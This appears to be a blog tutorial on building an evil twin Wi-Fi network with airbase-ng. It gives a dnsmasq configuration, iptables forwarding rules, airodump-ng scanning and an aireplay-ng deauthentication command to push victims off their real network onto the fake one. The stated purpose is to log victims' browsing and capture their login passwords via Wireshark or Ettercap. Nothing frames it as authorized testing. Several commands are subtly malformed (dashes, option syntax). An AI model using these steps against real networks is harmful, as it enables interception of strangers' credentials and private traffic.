Create Evil Twin Wireless Network with Kali Linux & Airbase-ng

Airbase-ng is an evil twin wireless network, where the targets will connect to it and still be able to use the internet as we will provide the internet for them to continue working without any distribution, and with them connected to our evil twin network it will be monitored and logged in order to capture sensitive information such as login passwords.

To create the evil twin wireless network, we’re going to use the airbase-ng, also we going to need a WIFI card that’s able to performs monitor mode and injection mode.

First, we need to install “dnsmasq” as it will be used to forward the dns traffics, just install it by “apt install dnsmasq”:

 Then, create a new file with the dnsmasq configurations:

interface=at0

dhcp-range=192.168.1.15,192.168.1.100,12h

dhcp-options=3,192.168.1.1

dhcp-options6,192.168.1.1

server=8.8.8.8

server=8.8.4.4

log-queries

log-dhcp

listen-address=127.0.0.1

Save it on your desktop as “dnsmasq.conf”

Now, let’s explain what are these commands doing line by line:

“interface=at0” is the interface that will be created by Airbase-ng.

“dhcp-range=192.168.1.15,192.168.1.100,12h” we decide the dhcp range of IP’s, it’s up to you as in my case i chose the range to be from .15-.100 and “12h” is the lease time.

“dhcp-options=3,192.168.1.1” options3 in case we have multiple gateways in our configuration file.

“dhcp-options6,192.168.1.1” option6 this will distribute the clients IP’s on the gateways identified by options3.

“Server=8.8.8.8” adding different dns like Google

The last step is to log any queries and dhcp traffics.

Now, we will put out WIFI card into monitor mode by running:

To start scanning for WIFI around us we will use:

airodump-ng wlan0

Leave it running to scan for all the WIFI’s in the area and find the target we need, and while it’s running, we’re going to start the Airbase-ng to create the Evil-Twin network, of course by now we have chosen one of these networks to duplicate by Airbase-ng:

By starting Airbase-ng we created the interface “at0”.

The next part is to enter some commands in order to configure the internet for the victim, as we need him to continue using the internet coming from our WIFI interface “at0” and in the same time we will log all his traffic including websites that’s he visiting and usernames and passwords he enters.

“ifconfig at0 up” to make sure the interface is up and running.

“ifconfig at0 192.168.1.1 netmask 255.255.255.0” configure the interface to use our netmask.

“route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1” configure the internet rout to use out gateway.

“iptables –flush” clear the iptables.

“iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE” the POSTROUTING is to control the flow of the traffic outbound the interface “eth0”, the MASQUERADE is to control the outgoing traffic without disturbing the original traffics on our machine.

“iptables –append FORWARD –interface at0 -j ACCEPT” start port forwarding on the interface “at0”.

“iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.1:80” the PREROUTING is to control the traffics Inbound through the gateway 192.168.1.1 and port 80.

 “iptables -t nat -A POSTROUTING -j MASQUERADE” just adding MASQUERADE to the Inbound interface to make sure no disturbance with the original traffics on our machine.

“echo 1 > /proc/sys/net/ipv4/ip_forward” to activate the port forwarding on our machine.

Now we need to Deauth any connected device on the target WIFI suing Aireplay-ng, to disconnect them from the target and connect to our Evil-Twin WIFI:

aireplay-ng –deauth 0 -a [BSSID of the target WIFI] wlan0

At this time all we have to do is wait for the target to disconnect from his network and connect to ours:

Take a look at this, the first WIFI is our Evil-Twin network we have created, and it’s open to any one to connect to, and the third WIFI is the victim WIFI and of course it’s locked or password protected and with the same name.

Now the target made a connection to our WIFI, let’s take a look at the dsnmsq part:

There are a lot of traffics that’s going on in here, but if we want to see more in details, we can run Wireshark:

You can use filters like tcp or https to look for specific information like sites logins to capture passwords or any sensitive information that you want.

Also, you can run MITM attack using “Ettercap”.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s